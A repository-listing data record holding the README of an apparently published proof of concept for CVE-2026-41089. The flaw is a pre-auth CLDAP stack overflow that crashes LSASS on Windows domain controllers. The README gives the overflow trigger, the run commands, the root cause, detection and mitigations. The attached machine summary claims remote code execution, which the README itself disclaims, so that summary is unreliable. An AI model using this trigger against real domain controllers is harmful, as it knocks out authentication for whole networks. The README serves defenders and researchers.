[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-82879":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":15,"forks30d":15,"starsTrendScore":15,"compositeScore":18,"rankGlobal":10,"rankLanguage":10,"license":19,"archived":20,"fork":20,"defaultBranch":21,"hasWiki":22,"hasPages":20,"topics":23,"createdAt":10,"pushedAt":10,"updatedAt":34,"readmeContent":35,"aiSummary":36,"trendingCount":15,"starSnapshotCount":15,"syncStatus":37,"lastSyncTime":38,"discoverSource":39},82879,"CVE-2026-41089","0xABCD01\u002FCVE-2026-41089","0xABCD01","CVE-2026-41089 PoC — Netlogon CLDAP stack buffer overflow (CVSS 9.8 CRITICAL)","",null,"Python",159,57,1,0,11,59,5.29,"MIT License",false,"main",true,[24,25,26,27,28,29,30,31,32,33],"buffer-overflow","cldap","cve","cve-2026-41089","exploit","poc","vulnerability","vulnerability-detection","windows","windows-server","2026-06-12 02:04:28","# CVE-2026-41089\n\n```\n ██████╗██╗   ██╗███████╗    ██╗  ██╗ ██╗ ██████╗  ██████╗\n██╔════╝██║   ██║██╔════╝    ██║  ██║███║██╔═████╗██╔═████╗\n██║     ██║   ██║█████╗      ███████║╚██║██║██╔██║██║██╔██║\n██║     ╚██╗ ██╔╝██╔══╝      ██╔══██║ ██║████╔╝██║████╔╝██║\n╚██████╗ ╚████╔╝ ███████╗    ██║  ██║ ██║╚██████╔╝╚██████╔╝\n ╚═════╝  ╚═══╝  ╚══════╝    ╚═╝  ╚═╝ ╚═╝ ╚═════╝  ╚═════╝\n```\n\n**Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow**\n\n![CVSS](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCVSS_3.1-9.8_CRITICAL-red?style=for-the-badge)\n![CWE](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCWE-121-orange?style=for-the-badge)\n![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FPython-3.8+-blue?style=for-the-badge&logo=python&logoColor=white)\n![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-green?style=for-the-badge)\n\n---\n\nOne crafted UDP packet to port 389 overflows a 528-byte stack buffer\ninside LSASS on any unpatched Windows Domain Controller. The process\ncrashes. The DC reboots in ~60 seconds. No authentication required.\n\n| | |\n|---|---|\n| **Attack Vector** | UDP 389 (CLDAP), pre-auth, zero credentials |\n| **Impact** | LSASS crash, DC reboot, potential RCE |\n| **CWE** | CWE-121 (Stack-based Buffer Overflow) |\n| **CVSS Vector** | `AV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H` |\n| **Published** | May 12, 2026 by Microsoft |\n\n---\n\n## Quick Start\n\n```\npython3 poc.py 10.0.50.21 corp.local\n```\n\nThree phases: normal ping to confirm the DC is alive, overflow ping\nwith a 130-character username, liveness check. Takes ~10 seconds.\n\n## Affected Systems\n\nEvery Windows Server version running as a Domain Controller:\n\n| Server Version     | Fixed In                 |\n|--------------------|--------------------------|\n| 2012 \u002F 2012 R2     | ESU-only patches         |\n| 2016               | 10.0.14393.9140          |\n| 2019               | 10.0.17763.8755          |\n| 2022               | 10.0.20348.5074          |\n| 2022 23H2          | 10.0.25398.2330          |\n| 2025               | 10.0.26100.32772         |\n\n## Root Cause\n\n`NlGetLocalPingResponse` allocates a 528-byte stack buffer and hands it\nto `BuildSamLogonResponse`. That function calls `NetpLogonPutUnicodeString`\nto write server name, domain name, GUIDs, and the attacker-controlled\nusername into the buffer.\n\nThe bug: `NetpLogonPutUnicodeString` receives a maximum length in bytes\nbut treats it as a WCHAR count. Every string written through this path\noccupies twice the expected space. The \"User\" field in the CLDAP filter\n(up to 130 wchars, 260 bytes on the wire) pushes the combined write\npast the 528-byte boundary.\n\n```\nI_NetLogonLdapLookupEx\n  -> NlGetLocalPingResponse           \u002F\u002F 528-byte stack buffer\n    -> LogonRequestHandler\n      -> BuildSamLogonResponse\n        -> NetpLogonPutUnicodeString   \u002F\u002F byte\u002FWCHAR size confusion\n```\n\n## Usage\n\n```\npython3 poc.py \u003Ctarget_ip> \u003Cdomain_name> [options]\n```\n\n| Flag | Description | Default |\n|------|-------------|---------|\n| `-l` | Username length in characters | 130 |\n| `-t` | UDP recv timeout (seconds) | 5 |\n| `-d` | Delay between overflow and liveness check (seconds) | 3 |\n\n```bash\n# Connectivity test (short username, no overflow)\npython3 poc.py 10.0.50.21 corp.local\n\n# Default overflow attempt\npython3 poc.py 10.0.50.21 corp.local -l 130\n\n# Larger payload, longer timeout for slow networks\npython3 poc.py 10.0.50.21 corp.local -l 200 -t 10\n```\n\nRequires Python 3.8+. No third-party packages.\n\n## How It Works\n\n1. **Phase 1.** A normal CLDAP ping with username \"testuser\" confirms\n   the target responds on UDP 389.\n2. **Phase 2.** The same packet structure, but the username is 130+\n   characters of \"A\". This pushes the serialized data past the stack\n   buffer boundary. If LSASS crashes, the recv times out.\n3. **Phase 3.** After a configurable delay, a second normal ping checks\n   whether the DC is still alive. No response = LSASS crash confirmed.\n\nThe overflow triggers a denial of service (LSASS crash, DC reboot).\nRCE through stack corruption is possible in theory. This PoC does not\nattempt code execution.\n\n## Detection\n\n**Network.** Scan CLDAP traffic for search requests where the \"User\"\nfilter attribute exceeds 20-30 characters. Normal DC locator pings\nuse service account names (short strings).\n\n**Host.** Watch for LSASS crashes tied to netlogon.dll (Event ID 1000).\nEnable Netlogon debug logging:\n\n```\nnltest \u002Fdbflag:0x2080ffff\n```\n\n## Mitigation\n\n- Install the May 2026 Microsoft security update\n- Restrict UDP 389 inbound to trusted management subnets\n- For legacy Server versions out of ESU: 0patch ships micropatches\n  (single instruction fix: `mov edx, 0x40` to halve the max username\n  length)\n\n## References\n\n- [Microsoft Security Update Guide](https:\u002F\u002Fmsrc.microsoft.com\u002Fupdate-guide\u002Fvulnerability\u002FCVE-2026-41089)\n- [NVD - CVE-2026-41089](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2026-41089)\n- [0patch Analysis and Micropatch](https:\u002F\u002Fblog.0patch.com\u002F2026\u002F05\u002Fmicropatches-released-for-windows_0304568783.html)\n- [Aretiq AI Reverse Engineering](https:\u002F\u002Faretiq.ai\u002Fresearch\u002Fvul260513-cve-2026-41089-microsoft-windows-netlogon-buildsamlogonresponse-stack-based-buffer-overflow-rce\u002F)\n- [RFC 4511 - LDAP](https:\u002F\u002Ftools.ietf.org\u002Fhtml\u002Frfc4511)\n- [MS-ADTS - CLDAP DC Locator](https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-adts\u002F0de3704e-a799-4afa-b12a-3fef2f8e2e66)\n\n---\n\n> **Legal.** This code exists for authorized security research and\n> education. Test only against systems you own or have written permission\n> to test. Unauthorized access to computer systems violates the CFAA and\n> equivalent laws in most jurisdictions.\n\n**[MIT License](LICENSE)**\n","该项目是一个针对CVE-2026-41089漏洞的PoC工具，利用Netlogon服务中的CLDAP栈缓冲区溢出实现远程代码执行。核心功能是通过发送特制的UDP数据包到目标Windows域控制器的389端口，触发LSASS进程崩溃并导致服务器重启，无需任何认证即可完成攻击。采用Python 3.8+编写，具备高危CVSS评分9.8，适用于安全研究人员和渗透测试人员在受控环境中评估Windows域控制器的安全性。",2,"2026-06-11 04:09:29","CREATED_QUERY"]